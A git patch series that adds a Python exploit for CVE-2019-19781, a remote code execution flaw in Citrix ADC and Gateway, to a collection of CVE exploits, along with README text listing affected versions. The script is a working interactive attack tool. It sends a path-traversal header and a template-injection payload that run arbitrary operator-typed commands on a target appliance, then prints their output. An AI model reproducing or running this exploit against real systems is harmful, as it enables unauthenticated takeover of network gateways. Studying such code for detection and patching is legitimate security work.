From d54fa1ef269faa61594b705662dc36a3dd9a0316 Mon Sep 17 00:00:00 2001
From: Austin Songer <austinvernsonger@protonmail.com>
Date: Wed, 22 Jan 2020 17:47:38 +0000
Subject: [PATCH 1/3] ADDED CVE: CVE-2019-19781

---
 CVE Exploits/Citrix CVE-2019-19781.py | 48 +++++++++++++++++++++++++++
 CVE Exploits/README.md                |  8 +++++
 2 files changed, 56 insertions(+)
 create mode 100644 CVE Exploits/Citrix CVE-2019-19781.py

diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py
new file mode 100644
index 0000000..0284d76
--- /dev/null
+++ b/CVE Exploits/Citrix CVE-2019-19781.py	
@@ -0,0 +1,48 @@
+#!/usr/bin/env python
+import requests
+import string
+import random
+import re
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
+print("Found by Mikhail Klyuchnikov")
+print("")
+
+if len(sys.argv) < 2:
+  print("[-] No URL provided")
+  sys.exit(0)
+
+while True:
+    try:
+      command = input("command > ")
+
+      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
+      print("[+] Adding bookmark", random_xml + ".xml")
+
+      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
+      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
+
+      if r.status_code == 200:
+        print("[+] Bookmark added")
+      else:
+        print("\n[-] Target not vulnerable or something went wrong")
+        sys.exit(0)
+
+      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      r = requests.get(burp0_url, headers=burp0_headers,verify=False)
+
+      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
+      print("[+] Result of the command: \n")
+      print(replaced)
+
+    except KeyboardInterrupt:
+            print("Exiting...")
+            break
\ No newline at end of file
diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md
index 8563a19..6a26871 100644
--- a/CVE Exploits/README.md	
+++ b/CVE Exploits/README.md	
@@ -23,6 +23,14 @@ On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2
 
 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
 
+## CVE-2019-19781 -  Citrix ADC Netscaler
+
+A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
+
+
+
+
+
 ## Thanks to
 
 * [Heartbleed - Official website](http://heartbleed.com)

From b6e7ad655fd299859928939ca14dc3c8d938e51a Mon Sep 17 00:00:00 2001
From: Austin Songer <austinvernsonger@protonmail.com>
Date: Wed, 22 Jan 2020 17:49:03 +0000
Subject: [PATCH 2/3] Add Technology Affected

---
 CVE Exploits/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md
index 6a26871..6b24823 100644
--- a/CVE Exploits/README.md	
+++ b/CVE Exploits/README.md	
@@ -27,6 +27,12 @@ A remote code execution vulnerability exists within multiple subsystems of Drupa
 
 A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
 
+Technology Affect:
+- Citrix ADC and Citrix Gateway version 13.0 all supported builds
+- Citrix ADC and NetScaler Gateway version 12.1 all supported builds
+- Citrix ADC and NetScaler Gateway version 12.0 all supported builds
+- Citrix ADC and NetScaler Gateway version 11.1 all supported builds
+- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
 
 
 

From aacd0954524a33c77d3f47b6394beb0a3f491ba4 Mon Sep 17 00:00:00 2001
From: Austin Songer <austinvernsonger@protonmail.com>
Date: Wed, 22 Jan 2020 17:49:47 +0000
Subject: [PATCH 3/3] Added link to exploit creator

---
 CVE Exploits/Citrix CVE-2019-19781.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py
index 0284d76..a6d4044 100644
--- a/CVE Exploits/Citrix CVE-2019-19781.py	
+++ b/CVE Exploits/Citrix CVE-2019-19781.py	
@@ -1,4 +1,7 @@
 #!/usr/bin/env python
+# https://github.com/mpgn/CVE-2019-19781
+# # #
+
 import requests
 import string
 import random